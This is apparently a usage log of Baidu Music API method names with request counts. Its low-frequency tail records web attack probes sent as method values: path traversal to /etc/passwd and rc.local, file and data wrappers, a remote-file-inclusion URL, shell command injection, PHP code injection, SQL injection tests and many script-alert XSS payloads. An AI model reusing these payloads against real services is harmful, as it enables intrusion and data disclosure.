baidu.ting.song.getInfos	62439625
baidu.ting.search.lrcpic	26209420
baidu.ting.song.baseInfo	26095807
baidu.ting.search.common	20477710
baidu.ting.search.catalogSug	19317947
baidu.ting.user.listenAge	18838652
baidu.ting.outerPassport.profile	17741598
baidu.ting.song.play	16914223
baidu.ting.song.down	8603508
baidu.ting.song.lry	8247988
baidu.ting.user.getUserBaseInfo	7565245
baidu.ting.artist.getSongList	5643533
baidu.ting.song.getInfo	5552741
baidu.ting.favorite.isCollect	5401467
baidu.ting.artist.getList	4945764
baidu.ting.billboard.billList	4592733
ting.baidu.diy.getPlaylists	4587639
baidu.ting.search.lrcys	4293991
baidu.ting.search.getPhotoInfos	3904906
baidu.ting.user.config	3602456
baidu.ting.game.gamedetail	3078940
baidu.ting.artist.getInfo	2880727
baidu.ting.plaza.getRecommendAlbum	2845674
baidu.ting.user.checkComVersion	2827264
baidu.ting.radio.playAction	2747848
baidu.ting.plaza.active	2613953
baidu.ting.active.start	2512115
baidu.ting.diy.gedanInfo	2408034
	2353963
baidu.ting.user.checkSuggestVersion	2057223
baidu.ting.user.getMessage	1854013
baidu.ting.plaza.getFocusPic	1848489
baidu.ting.search.suggestion	1446462
baidu.ting.artist.getinfo	1388914
baidu.ting.diy.gedanHot	1384761
baidu.ting.album.getAlbumInfo	1351606
baidu.ting.radio.getChannelSong	1168397
baidu.ting.diy.addListenCount	1046053
baidu.ting.user.registToUC	1044581
baidu.ting.vip.checkVIPPromotion	1033861
baidu.ting.diy.category	1009797
baidu.ting.favorite.getCollectSong	999330
ting.baidu.plaza.recdaily	985881
baidu.ting.plaza.recdaily	980126
baidu.ting.artist.getAlbumList	842228
baidu.ting.plaza.getPartDesc	798791
baidu.ting.feedback.song	787142
baidu.ting.user.down	775633
baidu.ting.tag.songlist	662807
baidu.ting.diy.gedan	659113
baidu.ting.song.audio	635255
baidu.ting.tag.getHotTag	575063
baidu.ting.user.RegistToImsg	572753
baidu.ting.song.buffer	561974
baidu.ting.diy.getNowOfficalList	518007
baidu.ting.diy.getSongFromOfficalList	458264
baidu.ting.radio.getCategoryList	450456
baidu.ting.billboard.billCategory	392640
baidu.ting.search.lrcyss	326275
baidu.ting.search.getPhotoInfo	313385
baidu.ting.diy.getPlaylists	312472
baidu.ting.game.gamelist	251840
baidu.ting.plaza.recommend	191184
baidu.ting.artist.get72HotArtist	184715
baidu.ting.song.getMulInfos	180150
baidu.ting.favorite.getFavoriteSong	168195
baidu.ting.favorite.addSongFavorites	134417
baidu.ting.mv.getIndexMV	121266
baidu.ting.favorite.addSongFavorite	106178
baidu.ting.diy.search	103788
baidu.ting.tag.getAllTag	103772
baidu.ting.video.getList	90739
baidu.ting.diy.getSimilarGedan	90001
baidu.ting.video.play	80985
baidu.ting.diy.getOfficialDiyList	74051
baidu.ting.favorite.delCollectSong	46322
baidu.ting.plaza.getNewSongs	41631
baidu.ting.user.checkVersion	39720
baidu.ting.mv.playMV	37234
baidu.ting.artist.getSpecialSongList	34463
ting.baidu.diy.getPlaylist	34298
baidu.ting.radio.getArtistChannelSong	27244
baidu.ting.radio.getFavoriteSong	24149
baidu.ting.user.nplogin	19566
baidu.ting.plaza.getArtistPlaza	16256
baidu.ting.diy.getPlaylist	16243
baidu.ting.radio.serv	14969
baidu.ting.feedback.crash	14083
baidu.ting.artist.getHighSongTitle	13292
baidu.ting.album.getList	10844
baidu.ting.diy.saveList	10210
baidu.ting.mv.searchMV	9487
baidu.ting.song.getMulInfo	9465
baidu.ting.diy.addListSong	8658
baidu.ting.song.cloud	8551
baidu.ting.favorite.delSongFavorite	8242
ting.baidu.film.getFilmInfo	8230
baidu.ting.video.category	6975
baidu.ting.weixin.response	6706
baidu.ting.artist.getQianQianArtist	6614
baidu.ting.diy.delListSong	5420
baidu.ting.cloud.record	4947
baidu.ting.cloud.checkFile	4519
baidu.ting.diy.delList	4314
baidu.ting.billboard.catalog	4260
baidu.ting.user.logout	3941
baidu.ting.colorRing.listen	3925
ting.baidu.artistapp.renum	3647
baidu.ting.user.regPassport	3537
baidu.ting.artist.getHighSongList	3487
baidu.ting.artist.getInfoList	2986
ting.baidu.search.lrcpic	2949
baidu.ting.colorRing.authset	2574
baidu.ting.colorRing.getCode	2539
baidu.ting.user.getMobileVcode	2459
ting.baidu.search.common	2336
baidu.ting.favorite.delSongFavorites	1990
ting.baidu.song.lry	1731
baidu.ting.diy.getRecommendSpeical	1728
baidu.ting.mv.getMultiSongMVInfo	1716
baidu.ting.favorite.getFavoriteAlbum	1428
baidu.ting.artist.getSongRank	1299
baidu.ting.artist.getSong	1270
baidu.ting.vip.checkUserExchange	1172
baidu.ting.song.getPic	1153
ting.baidu.billboard.billlist	1148
baidu.ting.mv.getMVCategory	844
baidu.ting.diy.addList	839
baidu.ting.cloud.signature	833
ting.baidu.artistapp.brief	758
ting.baidu.song.down	609
ting.baidu.plaza.getRecommendAlbum	605
ting.baidu.song.cloud	603
ting.baidu.song.baseInfo	603
ting.baidu.diy.gedan	595
ting.baidu.billboard.billCategory	594
baidu.ting.favorite.getListenHistory	587
baidu.ting.video.recMv	579
ting.baidu.diy.gedaninfo	570
ting.baidu.song.getinfos	568
ting.baidu.diy.gedanhot	567
ting.baidu.song.play	565
baidu.ting.feedback.info	559
baidu.ting.cloud.expand	455
baidu.ting.song.getSuoSongInfo	433
baidu.ting.diy.upList	367
baidu.ting.colorRing.subscribe	333
baidu.ting.colorRing.toneset	320
baidu.ting.favorite.getOffenListenList	319
ting.baidu.user.getUserBaseInfo	309
baidu.ting.user.activate	306
ting.baidu.plaza.getFocusPic	288
baidu.ting.artist.getInfoByName	269
baidu.ting.favorite.getInfoFromView	205
baidu.ting.artistapp.photo	196
baidu.ting.user.login	189
ting.baidu.artistapp.newList	164
baidu.ting.vip.exchangeVIP	128
ting.baidu.artistapp.news	113
 /v8  ADw-script AD4-sslx=812812 ADw-/script AD4- nonxss	111
baidu.ting.favorite.addAlbumFavorite	92
baidu.ting.song.getHash	51
baidu.ting.favorite.delAlbumFavorite	49
ting.baidu.artistapp.briefs	43
baidu.ting.user.addPassportInfo	41
baidu.ting.plaza.getMisNewSong	40
ting.baidu.artistapp.send	31
ting.baidu.album.getAlbumInfo	29
baidu.ting.album.getAlbumstyle	26
\' (	22
(	22
baidu.ting.song.playAAC	19
baidu.ting.game.catalog	16
ting.baidu.search.catalogSug	11
baidu.ting.game.gameplay	10
../../../../../../../../../../etc/passwd_	8
../../../../../../../../../../etc/passwd	8
set	8
file:///etc/rc.d/rc.local_	8
c:/windows/win.ini_	8
data://text/plain;base64,dGVzdA==_	8
/usr/bin/id;	8
data://text/plain;base64,dGVzdA==	8
1\\\";cat /etc/rc.d/rc.local;\\\"	8
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_	8
file:///etc/rc.d/rc.local	8
${@print(md5(812812))}	8
string:{var_dump(md5(812812))}	8
1;cat /etc/rc.d/rc.local;	8
%{	8
${	8
file:///etc/passwd	8
file:///etc/passwd_	8
c:/windows/win.ini	8
\'];${@print(md5(812812))};//	8
http://cirt.lnet/rfiinc.txt_	8
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local	8
../../../../../../../../../../etc/rc.d/rc.local_	8
../../../../../../../../../../etc/rc.d/rc.local	8
1\';cat /etc/rc.d/rc.local;\'	8
http://cirt.lnet/rfiinc.txt	8
ting.baidu.game.gamedetail	6
ting.baidu.mv.getArtistMVInfo	6
baidu.ting.song.playabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	6
baidu.ting.song.lryabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	6
ting.baidu.feedback.crash	5
../../../../../../../../../../etc/rc.d/rc.local_.jpg	5
ting.baidu.artist.getInfo	4
file:///etc/passwd_.jpeg	4
c:/windows/win.ini_.html	4
ting.baidu.plaza.recommend	3
ting.baidu.plaza.active	3
ting.baidu.game.catalog	3
ting.baidu.song.audio	3
baidu.ting.cloud.expandabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
baidu.ting.song.play\';alert(1);\'	3
http://cirt.lnet/rfiinc.txt_.jpeg	3
http://cirt.lnet/rfiinc.txt_.html	3
ting.baidu.search.playback	3
ting.baidu.mv.getMultiSongMVInfo	3
ting.baidu.song.thirddown	3
file:///etc/rc.d/rc.local_.html	3
ting.baidu.mv.getindexmv	3
ting.baidu.mv.playmv	3
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.htm	3
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.jpg	3
baidu.ting.cloud.recordabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
baidu.ting.cloud.checkFileabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
../../../../../../../../../../etc/passwd_.php	3
baidu.ting.cloud.signatureabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
baidu.ting.song.lry\' and \'8281\'=\'8281	2
baidu.ting.cloud.signature\';alert(1);\'	2
data://text/plain;base64,dGVzdA==_.jpeg	2
data://text/plain;base64,dGVzdA==_.html	2
data://text/plain;base64,dGVzdA==_.jpg	2
data://text/plain;base64,dGVzdA==_.php	2
file:///etc/passwd_.htm	2
baidu.ting.song.play\'\";alert(1);//	2
baidu.ting.officialdiy.getGeDanInfo	2
baidu.ting.vip.uservipinfo	2
file:///etc/passwd_.php	2
http://10.42.7.217/?1388070944.79	2
http://10.42.7.217/?1388070990.46	2
http://10.42.7.217/?1388067995.58	2
http://10.42.7.217/?1388063321.54	2
http://10.42.7.217/?1388063312.26	2
http://10.42.7.217/?1388068250.6	2
baidu.ting.song.play;alert(1);//	2
file:///etc/rc.d/rc.local_.htm	2
file:///etc/rc.d/rc.local_.php	2
3tkqz0VEsjaXe8HYR YDs2yNFy9XTL2qIzVFvXls3yd6abCa94tf7Xj0oLE8OU	2
baidu.ting.song.play--></script><script>alert(1)</script>	2
../../../../../../../../../../etc/rc.d/rc.local_.htm	2
baidu.ting.song.play>\'>\"><script>alert(1)</script>	2
baidu.ting.song.play\"><img src=1 onerror=alert(1)>	2
baidu.ting.song.play%\' and 8281=8281 and \'%\'=\'	2
baidu.ting.song.lry%\' and 8281=8281 and \'%\'=\'	2
baidu.ting.song.play\'>\\\';</script>>\\\"><script>alert(1)</script>\'	2
baidu.ting.song.play</textarea></title><script>alert(1)</script>	2
baidu.ting.song.play<script>confirm(1)</script>	2
baidu.ting.song.lry\'>\\\';</script>>\\\"><script>alert(1)</script>\'	2
baidu.ting.song.play<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	2
../../../../../../../../../../etc/passwd_.html	2
baidu.ting.song.play\') and 8288=8288 and (\'	2
baidu.ting.song.lry(\')\'))(\")\'\"\"\"\")	2
../../../../../../../../../../etc/passwd_.htm	2
baidu.ting.song.lry\') and 8288=8288 and (\'	2
baidu.ting.song.play\'/**/<scr/**/ipt>/**/>	2
baidu.ting.song.play(\')\'))(\")\'\"\"\"\")	2
baidu.ting.song.play\' and \'8281\'=\'8281	2
baidu.ting.song.play\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	2
baidu.ting.cloud.signature\'\";alert(1);//	1
baidu.ting.cloud.signature\";alert(1);\"	1
baidu.ting.song.playjavascript:alert(1)	1
baidu.ting.cloud.signature;alert(1);//	1
baidu.ting.cloud.expand;alert(1);//	1
ting.baidu.skin.getlist	1
ting.baidu.favorite.getCollectSong	1
baidu.ting.song.play\";alert(1);\"	1
c:/windows/win.ini_.php	1
ting.baidu.diy.getOfficialDiyList	1
c:/windows/win.ini_.jpg	1
http://cirt.lnet/rfiinc.txt_.php	1
http://cirt.lnet/rfiinc.txt_.jpg	1
c:/windows/win.ini_.htm	1
baidu.ting.diy.gedfo	1
file:///etc/rc.d/rc.local_.jpeg	1
baidu.ting.song.lry;alert(1);//	1
baidu.ting.cloud.expand>\'>\"><script>alert(1)</script>	1
baidu.ting.cloud.signature</script><script>alert(1);//	1
baidu.ting.cloud.expand\"><img src=1 onerror=alert(1)>	1
baidu.ting.cloud.signature<script>confirm(1)</script>	1
baidu.ting.cloud.record%\' and 8281=8281 and \'%\'=\'	1
baidu.ting.cloud.expand%\' and 8281=8281 and \'%\'=\'	1
../../../../../../../../../../etc/rc.d/rc.local_.jpeg	1
baidu.ting.song.getId=7514592	1
baidu.ting.song.lry>\'>\"><script>alert(1)</script>	1
baidu.ting.cloud.checkFile\') and 8288=8288 and (\'	1
baidu.ting.song.lry\"><img src=1 onerror=alert(1)>	1
baidu.ting.cloud.checkFile\'/**/<scr/**/ipt>/**/>	1
